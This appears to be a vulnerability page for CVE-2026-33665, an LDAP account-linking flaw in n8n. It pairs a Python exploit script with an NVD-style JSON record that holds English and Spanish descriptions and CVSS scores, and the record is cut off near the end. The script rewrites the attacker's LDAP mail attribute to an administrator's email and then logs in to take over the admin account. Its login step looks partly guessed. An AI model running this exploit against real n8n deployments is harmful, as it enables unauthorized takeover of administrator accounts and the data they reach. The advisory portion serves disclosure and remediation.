CVE-2026-33665

import ldap3 import requests # Configuration ldap_server = 'ldap://example.com' ldap_user_dn = 'cn=attacker,ou=users,dc=example,dc=com' ldap_password = 'attacker_password' target_admin_email = '[email protected]' n8n_login_url = 'https://n8n-instance.com/rest/login' # Step 1: Attacker modifies their own LDAP email attribute to match the admin's email try: server = ldap3.Server(ldap_server) conn = ldap3.Connection(server, user=ldap_user_dn, password=ldap_password, auto_bind=True) # Modify the 'mail' attribute conn.modify(ldap_user_dn, {'mail': [(ldap3.MODIFY_REPLACE, [target_admin_email])]}) if conn.result['description'] == 'success': print("[+] Successfully updated LDAP email to target admin email.") conn.unbind() except Exception as e: print(f"[-] LDAP modification failed: {e}") exit() # Step 2: Attacker logs in to n8n using their LDAP credentials # n8n sees the email matches the local admin account and links the identities session = requests.Session() payload = { 'email': target_admin_email, # n8n receives this from LDAP header or lookup 'password': ldap_password, 'isLdap': True } response = session.post(n8n_login_url, json=payload) if response.status_code == 200 and 'cookie' in response.headers or 'token' in response.json(): print("[+] Login successful. Account takeover completed.") print("[+] Session established. Attacker now has admin access.") else: print("[-] Login failed.")

{"cve": {"id": "CVE-2026-33665", "sourceIdentifier": "[email protected]", "published": "2026-03-25T18:16:32.390", "lastModified": "2026-03-30T14:23:59.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Prior to versions 2.4.0 and 1.121.0, when LDAP authentication is enabled, n8n automatically linked an LDAP identity to an existing local account if the LDAP email attribute matched the local account's email. An authenticated LDAP user who could control their own LDAP email attribute could set it to match another user's email — including an administrator's — and upon login gain full access to that account. The account linkage persisted even if the LDAP email was later reverted, resulting in a permanent account takeover. LDAP authentication must be configured and active (non-default). The issue has been fixed in n8n versions 2.4.0 and 1.121.0. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Disable LDAP authentication until the instance can be upgraded, restrict LDAP directory permissions so that users cannot modify their own email attributes, and/or audit existing LDAP-linked accounts for unexpected account associations. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures."}, {"lang": "es", "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. Antes de las versiones 2.4.0 y 1.121.0, cuando la autenticación LDAP está habilitada, n8n vinculaba automáticamente una identidad LDAP a una cuenta local existente si el atributo de correo electrónico LDAP coincidía con el correo electrónico de la cuenta local. Un usuario LDAP autenticado que pudiera controlar su propio atributo de correo electrónico LDAP podía configurarlo para que coincidiera con el correo electrónico de otro usuario —incluido el de un administrador— y, al iniciar sesión, obtener acceso completo a esa cuenta. La vinculación de la cuenta persistía incluso si el correo electrónico LDAP se revertía posteriormente, lo que resultaba en una toma de control permanente de la cuenta. La autenticación LDAP debe estar configurada y activa (no predeterminada). El problema ha sido solucionado en las versiones 2.4.0 y 1.121.0 de n8n. Los usuarios deberían actualizar a una de estas versiones o posteriores para remediar la vulnerabilidad. Si la actualización no es posible de inmediato, los administradores deberían considerar las siguientes mitigaciones temporales: Deshabilitar la autenticación LDAP hasta que la instancia pueda ser actualizada, restringir los permisos del directorio LDAP para que los usuarios no puedan modificar sus propios atributos de correo electrónico, y/o auditar las cuentas existentes vinculadas a LDAP en busca de asociaciones de cuenta inesperadas. Estas soluciones provisionales no remedian completamente el riesgo y solo deberían usarse como medidas de mitigación a corto plazo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInter ... (truncated)